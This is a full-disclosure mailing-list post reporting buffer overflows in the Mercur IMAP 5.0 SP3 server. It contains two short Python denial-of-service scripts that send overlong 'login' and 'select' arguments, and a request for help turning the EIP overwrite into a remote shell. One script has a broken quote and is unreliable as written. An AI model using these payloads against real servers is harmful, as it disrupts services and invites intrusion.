I found this bugs in a imap-server called Mercur IMAP 5.0 SP3 from http://www.atrium-software.com/, but i was not able to exploit it successful for a remote shell on WinXP ServicePack2. The program has an intern check for the string length or something like that. I can overwrite the EIP successfully but can not put my shellcode behind the EIP. Because of this fact i have to write the shellcode in front of the EIP and this results in a 135 byte for the shellcode without the required "a login" or "a select". Perhaps someone has a clue and can solve this problems and teach me some lessons for the future.
-- DoS Exploit --
import socket s=socket.socket() s.connect(("127.0.0.1", 143)) print s.recv(256) s.send("a001 login "\x41" * 275 + "\r\n")
import socket s=socket.socket() s.connect(("127.0.0.1", 143)) print s.recv(256) s.send("a001 login test test\r\n") print s.recv(256) s.send("a002 select " + "\x41" * 239 + "\r\n")
By the way at the first look it seems to be like some older bugs of this piece of software but I do not think so.
-- Bis zu 70% Ihrer Onlinekosten sparen: GMX SmartSurfer! Kostenlos downloaden: http://www.gmx.net/de/go/smartsurfer
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/